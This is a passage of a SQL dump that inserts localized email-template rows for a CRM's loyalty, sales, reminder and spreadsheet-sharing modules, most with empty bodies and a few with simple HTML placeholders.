(2536, 'loyalty', 'loyalty-birthday-bonus-point', 'greek', 'Loyalty birthday bonus point (Sent to contact) [greek]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2537, 'omni_sales', 'purchase-receipt', 'catalan', 'Purchase receipt (Sent to customer) [catalan]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2538, 'omni_sales', 'pre-orders-notify', 'catalan', 'Pre-orders notify (Sent to seller) [catalan]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2539, 'omni_sales', 'pre-orders-handover', 'catalan', 'Pre-orders handover [catalan]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2540, 'loyalty', 'loyalty-new-account-bonus-point', 'catalan', 'Loyalty new account bonus point (Sent to contact) [catalan]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2541, 'loyalty', 'loyalty-birthday-bonus-point', 'catalan', 'Loyalty birthday bonus point (Sent to contact) [catalan]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2542, 'omni_sales', 'purchase-receipt', 'german', 'Purchase receipt (Sent to customer) [german]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2543, 'omni_sales', 'pre-orders-notify', 'german', 'Pre-orders notify (Sent to seller) [german]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2544, 'omni_sales', 'pre-orders-handover', 'german', 'Pre-orders handover [german]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2545, 'loyalty', 'loyalty-new-account-bonus-point', 'german', 'Loyalty new account bonus point (Sent to contact) [german]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2546, 'loyalty', 'loyalty-birthday-bonus-point', 'german', 'Loyalty birthday bonus point (Sent to contact) [german]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2547, 'omni_sales', 'purchase-receipt', 'chinese', 'Purchase receipt (Sent to customer) [chinese]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2548, 'omni_sales', 'pre-orders-notify', 'chinese', 'Pre-orders notify (Sent to seller) [chinese]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2549, 'omni_sales', 'pre-orders-handover', 'chinese', 'Pre-orders handover [chinese]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2550, 'loyalty', 'loyalty-new-account-bonus-point', 'chinese', 'Loyalty new account bonus point (Sent to contact) [chinese]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2551, 'loyalty', 'loyalty-birthday-bonus-point', 'chinese', 'Loyalty birthday bonus point (Sent to contact) [chinese]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2552, 'omni_sales', 'purchase-receipt', 'vietnamese', 'Purchase receipt (Sent to customer) [vietnamese]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2553, 'omni_sales', 'pre-orders-notify', 'vietnamese', 'Pre-orders notify (Sent to seller) [vietnamese]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2554, 'omni_sales', 'pre-orders-handover', 'vietnamese', 'Pre-orders handover [vietnamese]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2555, 'loyalty', 'loyalty-new-account-bonus-point', 'vietnamese', 'Loyalty new account bonus point (Sent to contact) [vietnamese]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2556, 'loyalty', 'loyalty-birthday-bonus-point', 'vietnamese', 'Loyalty birthday bonus point (Sent to contact) [vietnamese]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2557, 'omni_sales', 'purchase-receipt', 'indonesia', 'Purchase receipt (Sent to customer) [indonesia]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2558, 'omni_sales', 'pre-orders-notify', 'indonesia', 'Pre-orders notify (Sent to seller) [indonesia]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2559, 'omni_sales', 'pre-orders-handover', 'indonesia', 'Pre-orders handover [indonesia]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2560, 'loyalty', 'loyalty-new-account-bonus-point', 'indonesia', 'Loyalty new account bonus point (Sent to contact) [indonesia]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2561, 'loyalty', 'loyalty-birthday-bonus-point', 'indonesia', 'Loyalty birthday bonus point (Sent to contact) [indonesia]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2562, 'omni_sales', 'purchase-receipt', 'french', 'Purchase receipt (Sent to customer) [french]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2563, 'omni_sales', 'pre-orders-notify', 'french', 'Pre-orders notify (Sent to seller) [french]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2564, 'omni_sales', 'pre-orders-handover', 'french', 'Pre-orders handover [french]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2565, 'loyalty', 'loyalty-new-account-bonus-point', 'french', 'Loyalty new account bonus point (Sent to contact) [french]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2566, 'loyalty', 'loyalty-birthday-bonus-point', 'french', 'Loyalty birthday bonus point (Sent to contact) [french]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2567, 'omni_sales', 'purchase-receipt', 'czech', 'Purchase receipt (Sent to customer) [czech]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2568, 'omni_sales', 'pre-orders-notify', 'czech', 'Pre-orders notify (Sent to seller) [czech]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2569, 'omni_sales', 'pre-orders-handover', 'czech', 'Pre-orders handover [czech]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2570, 'loyalty', 'loyalty-new-account-bonus-point', 'czech', 'Loyalty new account bonus point (Sent to contact) [czech]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2571, 'loyalty', 'loyalty-birthday-bonus-point', 'czech', 'Loyalty birthday bonus point (Sent to contact) [czech]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2572, 'omni_sales', 'purchase-receipt', 'romanian', 'Purchase receipt (Sent to customer) [romanian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2573, 'omni_sales', 'pre-orders-notify', 'romanian', 'Pre-orders notify (Sent to seller) [romanian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2574, 'omni_sales', 'pre-orders-handover', 'romanian', 'Pre-orders handover [romanian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2575, 'loyalty', 'loyalty-new-account-bonus-point', 'romanian', 'Loyalty new account bonus point (Sent to contact) [romanian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2576, 'loyalty', 'loyalty-birthday-bonus-point', 'romanian', 'Loyalty birthday bonus point (Sent to contact) [romanian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2577, 'omni_sales', 'purchase-receipt', 'polish', 'Purchase receipt (Sent to customer) [polish]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2578, 'omni_sales', 'pre-orders-notify', 'polish', 'Pre-orders notify (Sent to seller) [polish]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2579, 'omni_sales', 'pre-orders-handover', 'polish', 'Pre-orders handover [polish]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2580, 'loyalty', 'loyalty-new-account-bonus-point', 'polish', 'Loyalty new account bonus point (Sent to contact) [polish]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2581, 'loyalty', 'loyalty-birthday-bonus-point', 'polish', 'Loyalty birthday bonus point (Sent to contact) [polish]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2582, 'omni_sales', 'purchase-receipt', 'ukrainian', 'Purchase receipt (Sent to customer) [ukrainian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2583, 'omni_sales', 'pre-orders-notify', 'ukrainian', 'Pre-orders notify (Sent to seller) [ukrainian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2584, 'omni_sales', 'pre-orders-handover', 'ukrainian', 'Pre-orders handover [ukrainian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2585, 'loyalty', 'loyalty-new-account-bonus-point', 'ukrainian', 'Loyalty new account bonus point (Sent to contact) [ukrainian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2586, 'loyalty', 'loyalty-birthday-bonus-point', 'ukrainian', 'Loyalty birthday bonus point (Sent to contact) [ukrainian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2587, 'omni_sales', 'purchase-receipt', 'persian', 'Purchase receipt (Sent to customer) [persian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2588, 'omni_sales', 'pre-orders-notify', 'persian', 'Pre-orders notify (Sent to seller) [persian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2589, 'omni_sales', 'pre-orders-handover', 'persian', 'Pre-orders handover [persian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2590, 'loyalty', 'loyalty-new-account-bonus-point', 'persian', 'Loyalty new account bonus point (Sent to contact) [persian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2591, 'loyalty', 'loyalty-birthday-bonus-point', 'persian', 'Loyalty birthday bonus point (Sent to contact) [persian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2592, 'omni_sales', 'purchase-receipt', 'japanese', 'Purchase receipt (Sent to customer) [japanese]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2593, 'omni_sales', 'pre-orders-notify', 'japanese', 'Pre-orders notify (Sent to seller) [japanese]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2594, 'omni_sales', 'pre-orders-handover', 'japanese', 'Pre-orders handover [japanese]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2595, 'loyalty', 'loyalty-new-account-bonus-point', 'japanese', 'Loyalty new account bonus point (Sent to contact) [japanese]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2596, 'loyalty', 'loyalty-birthday-bonus-point', 'japanese', 'Loyalty birthday bonus point (Sent to contact) [japanese]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2597, 'omni_sales', 'purchase-receipt', 'spanish', 'Purchase receipt (Sent to customer) [spanish]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2598, 'omni_sales', 'pre-orders-notify', 'spanish', 'Pre-orders notify (Sent to seller) [spanish]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2599, 'omni_sales', 'pre-orders-handover', 'spanish', 'Pre-orders handover [spanish]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(2600, 'loyalty', 'loyalty-new-account-bonus-point', 'spanish', 'Loyalty new account bonus point (Sent to contact) [spanish]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2601, 'loyalty', 'loyalty-birthday-bonus-point', 'spanish', 'Loyalty birthday bonus point (Sent to contact) [spanish]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2602, 'omni_sales', 'purchase-receipt', 'italian', 'Purchase receipt (Sent to customer) [italian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2603, 'omni_sales', 'pre-orders-notify', 'italian', 'Pre-orders notify (Sent to seller) [italian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2604, 'omni_sales', 'pre-orders-handover', 'italian', 'Pre-orders handover [italian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2605, 'loyalty', 'loyalty-new-account-bonus-point', 'italian', 'Loyalty new account bonus point (Sent to contact) [italian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2606, 'loyalty', 'loyalty-birthday-bonus-point', 'italian', 'Loyalty birthday bonus point (Sent to contact) [italian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2607, 'omni_sales', 'purchase-receipt', 'slovak', 'Purchase receipt (Sent to customer) [slovak]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2608, 'omni_sales', 'pre-orders-notify', 'slovak', 'Pre-orders notify (Sent to seller) [slovak]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2609, 'omni_sales', 'pre-orders-handover', 'slovak', 'Pre-orders handover [slovak]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2610, 'loyalty', 'loyalty-new-account-bonus-point', 'slovak', 'Loyalty new account bonus point (Sent to contact) [slovak]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2611, 'loyalty', 'loyalty-birthday-bonus-point', 'slovak', 'Loyalty birthday bonus point (Sent to contact) [slovak]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2612, 'omni_sales', 'purchase-receipt', 'portuguese_br', 'Purchase receipt (Sent to customer) [portuguese_br]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2613, 'omni_sales', 'pre-orders-notify', 'portuguese_br', 'Pre-orders notify (Sent to seller) [portuguese_br]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2614, 'omni_sales', 'pre-orders-handover', 'portuguese_br', 'Pre-orders handover [portuguese_br]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2615, 'loyalty', 'loyalty-new-account-bonus-point', 'portuguese_br', 'Loyalty new account bonus point (Sent to contact) [portuguese_br]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2616, 'loyalty', 'loyalty-birthday-bonus-point', 'portuguese_br', 'Loyalty birthday bonus point (Sent to contact) [portuguese_br]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2617, 'client', 'reminder-send-to-contact', 'english', 'Reminder', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2618, 'client', 'reminder-send-to-contact', 'swedish', 'Reminder [swedish]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2619, 'client', 'reminder-send-to-contact', 'portuguese', 'Reminder [portuguese]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2620, 'client', 'reminder-send-to-contact', 'turkish', 'Reminder [turkish]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2621, 'client', 'reminder-send-to-contact', 'bulgarian', 'Reminder [bulgarian]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2622, 'client', 'reminder-send-to-contact', 'dutch', 'Reminder [dutch]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2623, 'client', 'reminder-send-to-contact', 'russian', 'Reminder [russian]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2624, 'client', 'reminder-send-to-contact', 'greek', 'Reminder [greek]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2625, 'client', 'reminder-send-to-contact', 'catalan', 'Reminder [catalan]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2626, 'client', 'reminder-send-to-contact', 'german', 'Reminder [german]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2627, 'client', 'reminder-send-to-contact', 'chinese', 'Reminder [chinese]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2628, 'client', 'reminder-send-to-contact', 'vietnamese', 'Reminder [vietnamese]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2629, 'client', 'reminder-send-to-contact', 'indonesia', 'Reminder [indonesia]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2630, 'client', 'reminder-send-to-contact', 'french', 'Reminder [french]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2631, 'client', 'reminder-send-to-contact', 'czech', 'Reminder [czech]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2632, 'client', 'reminder-send-to-contact', 'romanian', 'Reminder [romanian]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2633, 'client', 'reminder-send-to-contact', 'polish', 'Reminder [polish]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2634, 'client', 'reminder-send-to-contact', 'ukrainian', 'Reminder [ukrainian]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2635, 'client', 'reminder-send-to-contact', 'persian', 'Reminder [persian]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2636, 'client', 'reminder-send-to-contact', 'japanese', 'Reminder [japanese]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2637, 'client', 'reminder-send-to-contact', 'spanish', 'Reminder [spanish]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2638, 'client', 'reminder-send-to-contact', 'italian', 'Reminder [italian]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2639, 'client', 'reminder-send-to-contact', 'slovak', 'Reminder [slovak]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2640, 'client', 'reminder-send-to-contact', 'portuguese_br', 'Reminder [portuguese_br]', 'New Reminder', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2641, 'client', 'reminder-service-send-to-contact', 'english', 'Services', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2642, 'client', 'reminder-service-send-to-contact', 'swedish', 'Services [swedish]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2643, 'client', 'reminder-service-send-to-contact', 'portuguese', 'Services [portuguese]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2644, 'client', 'reminder-service-send-to-contact', 'turkish', 'Services [turkish]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2645, 'client', 'reminder-service-send-to-contact', 'bulgarian', 'Services [bulgarian]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2646, 'client', 'reminder-service-send-to-contact', 'dutch', 'Services [dutch]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2647, 'client', 'reminder-service-send-to-contact', 'russian', 'Services [russian]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2648, 'client', 'reminder-service-send-to-contact', 'greek', 'Services [greek]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2649, 'client', 'reminder-service-send-to-contact', 'catalan', 'Services [catalan]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2650, 'client', 'reminder-service-send-to-contact', 'german', 'Services [german]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2651, 'client', 'reminder-service-send-to-contact', 'chinese', 'Services [chinese]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2652, 'client', 'reminder-service-send-to-contact', 'vietnamese', 'Services [vietnamese]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2653, 'client', 'reminder-service-send-to-contact', 'indonesia', 'Services [indonesia]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2654, 'client', 'reminder-service-send-to-contact', 'french', 'Services [french]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2655, 'client', 'reminder-service-send-to-contact', 'czech', 'Services [czech]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2656, 'client', 'reminder-service-send-to-contact', 'romanian', 'Services [romanian]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2657, 'client', 'reminder-service-send-to-contact', 'polish', 'Services [polish]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2658, 'client', 'reminder-service-send-to-contact', 'ukrainian', 'Services [ukrainian]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2659, 'client', 'reminder-service-send-to-contact', 'persian', 'Services [persian]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2660, 'client', 'reminder-service-send-to-contact', 'japanese', 'Services [japanese]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2661, 'client', 'reminder-service-send-to-contact', 'spanish', 'Services [spanish]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2662, 'client', 'reminder-service-send-to-contact', 'italian', 'Services [italian]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2663, 'client', 'reminder-service-send-to-contact', 'slovak', 'Services [slovak]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2664, 'client', 'reminder-service-send-to-contact', 'portuguese_br', 'Services [portuguese_br]', 'New Service', '<p>Hi {contact_name}<br /><br /><strong>Description:</strong> {item_description}<br /></p>', '', NULL, 0, 1, 0),
(2665, 'spreadsheet_online', 'spreadsheet-share-assigned', 'english', 'Spreadsheet share assigned', 'Spreadsheet Online - Share {type_spreadsheet} For You', '<span style=\\\"font-size: 12pt;\\\"> Hello {receiver}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\">You have been shared by {sender} in the {name_spreadsheet} {type_spreadsheet}</span>\r\n  Please click on the link to view information: {share_link_spreadsheet}\r\n  </span><br /><br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2666, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'english', 'Spreadsheet share assigned client', 'Spreadsheet Online - Share {type_spreadsheet} For You', '<span style=\\\"font-size: 12pt;\\\"> Hello {receiver}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\">You have been shared by {sender} in the {name_spreadsheet} {type_spreadsheet}</span>\r\n  Please click on the link to view information: {share_link_client_spreadsheet}\r\n  </span><br /><br />', '{companyname} | CRM', NULL, 0, 1, 0),
(2667, 'spreadsheet_online', 'spreadsheet-share-assigned', 'swedish', 'Spreadsheet share assigned [swedish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2668, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'swedish', 'Spreadsheet share assigned client [swedish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2669, 'spreadsheet_online', 'spreadsheet-share-assigned', 'portuguese', 'Spreadsheet share assigned [portuguese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2670, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'portuguese', 'Spreadsheet share assigned client [portuguese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2671, 'spreadsheet_online', 'spreadsheet-share-assigned', 'turkish', 'Spreadsheet share assigned [turkish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2672, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'turkish', 'Spreadsheet share assigned client [turkish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2673, 'spreadsheet_online', 'spreadsheet-share-assigned', 'bulgarian', 'Spreadsheet share assigned [bulgarian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2674, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'bulgarian', 'Spreadsheet share assigned client [bulgarian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2675, 'spreadsheet_online', 'spreadsheet-share-assigned', 'dutch', 'Spreadsheet share assigned [dutch]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2676, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'dutch', 'Spreadsheet share assigned client [dutch]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2677, 'spreadsheet_online', 'spreadsheet-share-assigned', 'russian', 'Spreadsheet share assigned [russian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2678, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'russian', 'Spreadsheet share assigned client [russian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2679, 'spreadsheet_online', 'spreadsheet-share-assigned', 'greek', 'Spreadsheet share assigned [greek]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2680, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'greek', 'Spreadsheet share assigned client [greek]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2681, 'spreadsheet_online', 'spreadsheet-share-assigned', 'catalan', 'Spreadsheet share assigned [catalan]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2682, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'catalan', 'Spreadsheet share assigned client [catalan]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2683, 'spreadsheet_online', 'spreadsheet-share-assigned', 'german', 'Spreadsheet share assigned [german]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2684, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'german', 'Spreadsheet share assigned client [german]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
